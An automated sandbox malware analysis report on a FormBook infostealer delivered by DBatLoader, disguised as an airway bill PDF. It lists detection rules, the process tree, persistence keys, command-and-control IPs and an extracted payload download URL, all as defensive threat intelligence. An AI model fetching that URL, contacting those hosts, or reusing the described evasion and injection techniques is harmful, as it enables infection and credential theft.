Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe

Overview

General Information

Sample name:Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe
Analysis ID:1582317
MD5:09f4f91713bd6588465534822d5ad96c
SHA1:3b6b69c8709aea821d60248294d52e3cfefecb23
SHA256:c8e0836b1e1ea4ee7486eb41994ae198cb5f60f460dc4cbefbbabc186329855f
Tags:exeuser-TeamDreier
Infos:

Detection

DBatLoader, FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected DBatLoader
Yara detected FormBook
AI detected suspicious sample
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Drops PE files with a suspicious file extension
Found direct / indirect Syscall (likely to bypass EDR)
Initial sample is a PE file and has a suspicious name
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Sample is not signed and drops a device driver
Sample uses process hollowing technique
Sigma detected: DLL Search Order Hijackig Via Additional Space in Path
Sigma detected: Execution from Suspicious Folder
Sigma detected: Files With System Process Name In Unsuspected Locations
Sigma detected: New RUN Key Pointing to Suspicious Folder
Sigma detected: Parent in Public Folder Suspicious Process
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a connection to the internet is available
Contains functionality to dynamically determine API calls
Contains functionality to launch a process as a different user
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Creates a process in suspended mode (likely to inject code)
Creates processes with suspicious names
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Execution of Suspicious File Type Extension
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara detected Keylogger Generic

Classification

Process Tree

  • System is w10x64
  • Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe (PID: 5016 cmdline: "C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe" MD5: 09F4F91713BD6588465534822D5AD96C)
    • cmd.exe (PID: 6488 cmdline: C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 6484 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • hdcleziT.pif (PID: 6520 cmdline: C:\Users\Public\Libraries\hdcleziT.pif MD5: 22331ABCC9472CC9DC6F37FAF333AA2C)
      • WQzLddwiZR.exe (PID: 5480 cmdline: "C:\Program Files (x86)\WDmVPKMsYWkiMMtMFxMhEzeJnYuwTWZuIdiFgSkFCldxaFGwlFILXgUMWRDuvixzKBzhBZmNRBJI\WQzLddwiZR.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • proquota.exe (PID: 3560 cmdline: "C:\Windows\SysWOW64\proquota.exe" MD5: 224AA81092A51AE0080DEE1E454E11AD)
          • WQzLddwiZR.exe (PID: 4608 cmdline: "C:\Program Files (x86)\WDmVPKMsYWkiMMtMFxMhEzeJnYuwTWZuIdiFgSkFCldxaFGwlFILXgUMWRDuvixzKBzhBZmNRBJI\WQzLddwiZR.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 5668 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • Tizelcdh.PIF (PID: 2308 cmdline: "C:\Users\Public\Libraries\Tizelcdh.PIF" MD5: 09F4F91713BD6588465534822D5AD96C)
    • cmd.exe (PID: 7128 cmdline: C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 5588 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • hdcleziT.pif (PID: 4884 cmdline: C:\Users\Public\Libraries\hdcleziT.pif MD5: 22331ABCC9472CC9DC6F37FAF333AA2C)
      • WQzLddwiZR.exe (PID: 6708 cmdline: "C:\Program Files (x86)\WDmVPKMsYWkiMMtMFxMhEzeJnYuwTWZuIdiFgSkFCldxaFGwlFILXgUMWRDuvixzKBzhBZmNRBJI\WQzLddwiZR.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • proquota.exe (PID: 4256 cmdline: "C:\Windows\SysWOW64\proquota.exe" MD5: 224AA81092A51AE0080DEE1E454E11AD)
  • Tizelcdh.PIF (PID: 6788 cmdline: "C:\Users\Public\Libraries\Tizelcdh.PIF" MD5: 09F4F91713BD6588465534822D5AD96C)
    • cmd.exe (PID: 4776 cmdline: C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 5328 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • hdcleziT.pif (PID: 5352 cmdline: C:\Users\Public\Libraries\hdcleziT.pif MD5: 22331ABCC9472CC9DC6F37FAF333AA2C)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
DBatLoaderThis Delphi loader misuses Cloud storage services, such as Google Drive to download the Delphi stager component. The Delphi stager has the actual payload embedded as a resource and starts it.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.dbatloader
NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

Threatname: DBatLoader

{"Download Url": ["https://drive.google.com/uc?export=download&id=1DIFF5eqwVA8IoDMW5L-uJvPMuo0Aiqk1"]}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000000.00000002.2231702231.000000007FBA0000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_DBatLoaderYara detected DBatLoaderJoe Security
    00000012.00000002.3370454633.0000000000AF0000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000012.00000002.3370291190.0000000000AA0000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        0000000B.00000002.2806584419.000000001A250000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          00000000.00000002.2191756371.00000000022C6000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_DBatLoaderYara detected DBatLoaderJoe Security
            Click to see the 12 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            15.2.hdcleziT.pif.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
              15.2.hdcleziT.pif.400000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
                0.2.Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe.22c67a8.0.raw.unpackJoeSecurity_DBatLoaderYara detected DBatLoaderJoe Security
                  5.2.hdcleziT.pif.400000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
                    5.2.hdcleziT.pif.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
                      Click to see the 6 entries

                      Sigma Signatures

                      System Summary

                      barindex
                      Sigma detected: DLL Search Order Hijackig Via Additional Space in Path
                      Source: File createdAuthor: frack113, Nasreddine Bencherchali: Data: EventID: 11, Image: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe, ProcessId: 5016, TargetFilename: C:\Windows \SysWOW64\NETUTILS.dll
                      Sigma detected: Execution from Suspicious Folder
                      Source: Process startedAuthor: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: C:\Users\Public\Libraries\hdcleziT.pif, CommandLine: C:\Users\Public\Libraries\hdcleziT.pif, CommandLine|base64offset|contains: , Image: C:\Users\Public\Libraries\hdcleziT.pif, NewProcessName: C:\Users\Public\Libraries\hdcleziT.pif, OriginalFileName: C:\Users\Public\Libraries\hdcleziT.pif, ParentCommandLine: "C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe", ParentImage: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe, ParentProcessId: 5016, ParentProcessName: Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe, ProcessCommandLine: C:\Users\Public\Libraries\hdcleziT.pif, ProcessId: 6520, ProcessName: hdcleziT.pif
                      Sigma detected: Files With System Process Name In Unsuspected Locations
                      Source: File createdAuthor: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe, ProcessId: 5016, TargetFilename: C:\Windows \SysWOW64\svchost.exe
                      Sigma detected: New RUN Key Pointing to Suspicious Folder
                      Source: Registry Key setAuthor: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing: Data: Details: C:\Users\Public\Tizelcdh.url, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe, ProcessId: 5016, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Tizelcdh
                      Sigma detected: Parent in Public Folder Suspicious Process
                      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd, CommandLine: C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Users\Public\Libraries\Tizelcdh.PIF" , ParentImage: C:\Users\Public\Libraries\Tizelcdh.PIF, ParentProcessId: 2308, ParentProcessName: Tizelcdh.PIF, ProcessCommandLine: C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd, ProcessId: 7128, ProcessName: cmd.exe
                      Sigma detected: CurrentVersion Autorun Keys Modification
                      Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\Public\Tizelcdh.url, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe, ProcessId: 5016, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Tizelcdh
                      Sigma detected: Execution of Suspicious File Type Extension
                      Source: Process startedAuthor: Max Altgelt (Nextron Systems): Data: Command: C:\Users\Public\Libraries\hdcleziT.pif, CommandLine: C:\Users\Public\Libraries\hdcleziT.pif, CommandLine|base64offset|contains: , Image: C:\Users\Public\Libraries\hdcleziT.pif, NewProcessName: C:\Users\Public\Libraries\hdcleziT.pif, OriginalFileName: C:\Users\Public\Libraries\hdcleziT.pif, ParentCommandLine: "C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe", ParentImage: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe, ParentProcessId: 5016, ParentProcessName: Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe, ProcessCommandLine: C:\Users\Public\Libraries\hdcleziT.pif, ProcessId: 6520, ProcessName: hdcleziT.pif

                      Suricata Signatures

                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2024-12-30T10:57:03.587981+010020283713Unknown Traffic192.168.2.649710142.250.186.174443TCP
                      2024-12-30T10:57:04.990462+010020283713Unknown Traffic192.168.2.649711172.217.16.193443TCP
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2024-12-30T10:58:27.534284+010020507451Malware Command and Control Activity Detected192.168.2.649987188.114.97.380TCP
                      2024-12-30T10:58:50.986008+010020507451Malware Command and Control Activity Detected192.168.2.64999152.223.13.4180TCP
                      2024-12-30T10:59:04.630258+010020507451Malware Command and Control Activity Detected192.168.2.649996108.179.193.2380TCP
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2024-12-30T10:58:27.534284+010028554651A Network Trojan was detected192.168.2.649987188.114.97.380TCP
                      2024-12-30T10:58:50.986008+010028554651A Network Trojan was detected192.168.2.64999152.223.13.4180TCP
                      2024-12-30T10:59:04.630258+010028554651A Network Trojan was detected192.168.2.649996108.179.193.2380TCP
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2024-12-30T10:58:43.355868+010028554641A Network Trojan was detected192.168.2.64998852.223.13.4180TCP
                      2024-12-30T10:58:45.893956+010028554641A Network Trojan was detected192.168.2.64998952.223.13.4180TCP
                      2024-12-30T10:58:48.451399+010028554641A Network Trojan was detected192.168.2.64999052.223.13.4180TCP
                      2024-12-30T10:58:57.038535+010028554641A Network Trojan was detected192.168.2.649993108.179.193.2380TCP
                      2024-12-30T10:58:59.564543+010028554641A Network Trojan was detected192.168.2.649994108.179.193.2380TCP
                      2024-12-30T10:59:02.166341+010028554641A Network Trojan was detected192.168.2.649995108.179.193.2380TCP

                      Joe Sandbox Signatures

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection

                      barindex
                      Found malware configuration
                      Source: Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeMalware Configuration Extractor: DBatLoader {"Download Url": ["https://drive.google.com/uc?export=download&id=1DIFF5eqwVA8IoDMW5L-uJvPMuo0Aiqk1"]}
                      Multi AV Scanner detection for dropped file
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFReversingLabs: Detection: 26%
                      Multi AV Scanner detection for submitted file
                      Source: Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeReversingLabs: Detection: 26%
                      Source: Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeVirustotal: Detection: 33%Perma Link
                      Yara detected FormBook
                      Source: Yara matchFile source: 15.2.hdcleziT.pif.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 15.2.hdcleziT.pif.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.hdcleziT.pif.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.hdcleziT.pif.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 11.2.hdcleziT.pif.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 11.2.hdcleziT.pif.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000012.00000002.3370454633.0000000000AF0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000002.3370291190.0000000000AA0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000B.00000002.2806584419.000000001A250000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.2639223190.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000F.00000002.2725067092.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000014.00000002.2805235368.0000000000650000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000002.3368003513.00000000004A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000B.00000002.2788912013.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000B.00000002.2807095527.000000001D920000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000011.00000002.3370452478.0000000002F00000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.2699018066.0000000024B40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000013.00000002.3371188324.0000000005980000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.2702788304.0000000024FD0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                      AI detected suspicious sample
                      Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                      Source: Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                      Source: unknownHTTPS traffic detected: 142.250.186.174:443 -> 192.168.2.6:49710 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 172.217.16.193:443 -> 192.168.2.6:49711 version: TLS 1.2
                      Source: Binary string: E:\Adlice\Truesight\x64\Release\truesight.pdb source: Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe, 00000000.00000002.2230319620.000000007F280000.00000004.00001000.00020000.00000000.sdmp, Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe, 00000000.00000003.2163668078.0000000021741000.00000004.00000020.00020000.00000000.sdmp, Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe, 00000000.00000002.2226671815.00000000218D6000.00000004.00001000.00020000.00000000.sdmp, Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe, 00000000.00000003.2163163241.000000007ED40000.00000004.00001000.00020000.00000000.sdmp, Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe, 00000000.00000002.2220855651.000000002084F000.00000004.00001000.00020000.00000000.sdmp, Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe, 00000000.00000003.2163668078.000000002179E000.00000004.00000020.00020000.00000000.sdmp, Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe, 00000000.00000003.2162990013.000000007EDA3000.00000004.00001000.00020000.00000000.sdmp, Tizelcdh.PIF, 00000007.00000002.2430372024.000000002079A000.00000004.00001000.00020000.00000000.sdmp, Tizelcdh.PIF, 0000000C.00000003.2404075127.000000000066E000.00000004.00000020.00020000.00000000.sdmp, Tizelcdh.PIF, 0000000C.00000003.2404075127.00000000006C6000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: WQzLddwiZR.exe, 00000011.00000000.2545685733.000000000081E000.00000002.00000001.01000000.00000008.sdmp, WQzLddwiZR.exe, 00000013.00000002.3368381118.000000000081E000.00000002.00000001.01000000.00000008.sdmp, WQzLddwiZR.exe, 00000015.00000000.2752944866.000000000081E000.00000002.00000001.01000000.00000008.sdmp
                      Source: Binary string: easinvoker.pdb source: Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe, 00000000.00000002.2230319620.000000007F280000.00000004.00001000.00020000.00000000.sdmp, Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe, 00000000.00000002.2220855651.0000000020800000.00000004.00001000.00020000.00000000.sdmp, Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe, 00000000.00000003.2162990013.000000007ED90000.00000004.00001000.00020000.00000000.sdmp, Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe, 00000000.00000002.2220855651.000000002084F000.00000004.00001000.00020000.00000000.sdmp, Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe, 00000000.00000003.2162990013.000000007EDA3000.00000004.00001000.00020000.00000000.sdmp, Tizelcdh.PIF, 00000007.00000002.2430372024.000000002079A000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: wntdll.pdbUGP source: hdcleziT.pif, 00000005.00000003.2447031738.0000000024928000.00000004.00000020.00020000.00000000.sdmp, hdcleziT.pif, 00000005.00000003.2481886824.0000000024AD8000.00000004.00000020.00020000.00000000.sdmp, hdcleziT.pif, 00000005.00000002.2700732408.0000000024C80000.00000040.00001000.00020000.00000000.sdmp, hdcleziT.pif, 00000005.00000002.2700732408.0000000024E1E000.00000040.00001000.00020000.00000000.sdmp, hdcleziT.pif, 0000000B.00000003.2639139666.0000000019F7A000.00000004.00000020.00020000.00000000.sdmp, hdcleziT.pif, 0000000B.00000003.2644190157.000000001A12A000.00000004.00000020.00020000.00000000.sdmp, hdcleziT.pif, 0000000B.00000002.2806628363.000000001A46E000.00000040.00001000.00020000.00000000.sdmp, hdcleziT.pif, 0000000B.00000002.2806628363.000000001A2D0000.00000040.00001000.00020000.00000000.sdmp, hdcleziT.pif, 0000000F.00000002.2752209282.0000000030680000.00000040.00001000.00020000.00000000.sdmp, hdcleziT.pif, 0000000F.00000003.2716304869.000000003032B000.00000004.00000020.00020000.00000000.sdmp, hdcleziT.pif, 0000000F.00000003.2718335286.00000000304D9000.00000004.00000020.00020000.00000000.sdmp, hdcleziT.pif, 0000000F.00000002.2752209282.000000003081E000.00000040.00001000.00020000.00000000.sdmp, proquota.exe, 00000012.00000003.2654345746.00000000043C1000.00000004.00000020.00020000.00000000.sdmp, proquota.exe, 00000012.00000003.2631939876.0000000004216000.00000004.00000020.00020000.00000000.sdmp, proquota.exe, 00000012.00000002.3371310790.0000000004570000.00000040.00001000.00020000.00000000.sdmp, proquota.exe, 00000012.00000002.3371310790.000000000470E000.00000040.00001000.00020000.00000000.sdmp, proquota.exe, 00000014.00000002.2805524541.000000000498E000.00000040.00001000.00020000.00000000.sdmp, proquota.exe, 00000014.00000003.2791416018.000000000463E000.00000004.00000020.00020000.00000000.sdmp, proquota.exe, 00000014.00000002.2805524541.00000000047F0000.00000040.00001000.00020000.00000000.sdmp, proquota.exe, 00000014.00000003.2789081856.0000000004487000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: proquota.pdbGCTL source: hdcleziT.pif, 00000005.00000003.2633995810.000000002483C000.00000004.00000020.00020000.00000000.sdmp, hdcleziT.pif, 0000000B.00000002.2806361491.0000000019D97000.00000004.00000020.00020000.00000000.sdmp, WQzLddwiZR.exe, 00000011.00000002.3369403397.0000000001148000.00000004.00000020.00020000.00000000.sdmp, WQzLddwiZR.exe, 00000013.00000002.3369597830.0000000000AF8000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: wntdll.pdb source: hdcleziT.pif, hdcleziT.pif, 0000000B.00000003.2639139666.0000000019F7A000.00000004.00000020.00020000.00000000.sdmp, hdcleziT.pif, 0000000B.00000003.2644190157.000000001A12A000.00000004.00000020.00020000.00000000.sdmp, hdcleziT.pif, 0000000B.00000002.2806628363.000000001A46E000.00000040.00001000.00020000.00000000.sdmp, hdcleziT.pif, 0000000B.00000002.2806628363.000000001A2D0000.00000040.00001000.00020000.00000000.sdmp, hdcleziT.pif, 0000000F.00000002.2752209282.0000000030680000.00000040.00001000.00020000.00000000.sdmp, hdcleziT.pif, 0000000F.00000003.2716304869.000000003032B000.00000004.00000020.00020000.00000000.sdmp, hdcleziT.pif, 0000000F.00000003.2718335286.00000000304D9000.00000004.00000020.00020000.00000000.sdmp, hdcleziT.pif, 0000000F.00000002.2752209282.000000003081E000.00000040.00001000.00020000.00000000.sdmp, proquota.exe, 00000012.00000003.2654345746.00000000043C1000.00000004.00000020.00020000.00000000.sdmp, proquota.exe, 00000012.00000003.2631939876.0000000004216000.00000004.00000020.00020000.00000000.sdmp, proquota.exe, 00000012.00000002.3371310790.0000000004570000.00000040.00001000.00020000.00000000.sdmp, proquota.exe, 00000012.00000002.3371310790.000000000470E000.00000040.00001000.00020000.00000000.sdmp, proquota.exe, 00000014.00000002.2805524541.000000000498E000.00000040.00001000.00020000.00000000.sdmp, proquota.exe, 00000014.00000003.2791416018.000000000463E000.00000004.00000020.00020000.00000000.sdmp, proquota.exe, 00000014.00000002.2805524541.00000000047F0000.00000040.00001000.00020000.00000000.sdmp, proquota.exe, 00000014.00000003.2789081856.0000000004487000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: proquota.pdb source: hdcleziT.pif, 00000005.00000003.2633995810.000000002483C000.00000004.00000020.00020000.00000000.sdmp, hdcleziT.pif, 0000000B.00000002.2806361491.0000000019D97000.00000004.00000020.00020000.00000000.sdmp, WQzLddwiZR.exe, 00000011.00000002.3369403397.0000000001148000.00000004.00000020.00020000.00000000.sdmp, WQzLddwiZR.exe, 00000013.00000002.3369597830.0000000000AF8000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: easinvoker.pdbGCTL source: Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe, 00000000.00000002.2230319620.000000007F280000.00000004.00001000.00020000.00000000.sdmp, Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe, 00000000.00000002.2220855651.0000000020800000.00000004.00001000.00020000.00000000.sdmp, Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe, 00000000.00000003.2163345039.0000000021742000.00000004.00000020.00020000.00000000.sdmp, Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe, 00000000.00000003.2162990013.000000007ED90000.00000004.00001000.00020000.00000000.sdmp, Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe, 00000000.00000002.2220855651.000000002084F000.00000004.00001000.00020000.00000000.sdmp, Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe, 00000000.00000003.2162990013.000000007EDA3000.00000004.00001000.00020000.00000000.sdmp, Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe, 00000000.00000003.2163345039.0000000021771000.00000004.00000020.00020000.00000000.sdmp, Tizelcdh.PIF, 00000007.00000002.2430372024.000000002079A000.00000004.00001000.00020000.00000000.sdmp, Tizelcdh.PIF, 00000007.00000003.2318056683.00000000006A9000.00000004.00000020.00020000.00000000.sdmp, Tizelcdh.PIF, 00000007.00000003.2318056683.00000000006DA000.00000004.00000020.00020000.00000000.sdmp, Tizelcdh.PIF, 0000000C.00000003.2404075127.000000000069E000.00000004.00000020.00020000.00000000.sdmp, Tizelcdh.PIF, 0000000C.00000003.2404075127.000000000066E000.00000004.00000020.00020000.00000000.sdmp
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeCode function: 0_2_02B258B4 GetModuleHandleA,GetProcAddress,lstrcpynA,lstrcpynA,lstrcpynA,FindFirstFileA,FindClose,lstrlenA,lstrcpynA,lstrlenA,lstrcpynA,0_2_02B258B4

                      Networking

                      barindex
                      Suricata IDS alerts for network traffic
                      Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49989 -> 52.223.13.41:80
                      Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49990 -> 52.223.13.41:80
                      Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:49987 -> 188.114.97.3:80
                      Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:49987 -> 188.114.97.3:80
                      Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:49991 -> 52.223.13.41:80
                      Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:49996 -> 108.179.193.23:80
                      Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:49996 -> 108.179.193.23:80
                      Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49994 -> 108.179.193.23:80
                      Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:49991 -> 52.223.13.41:80
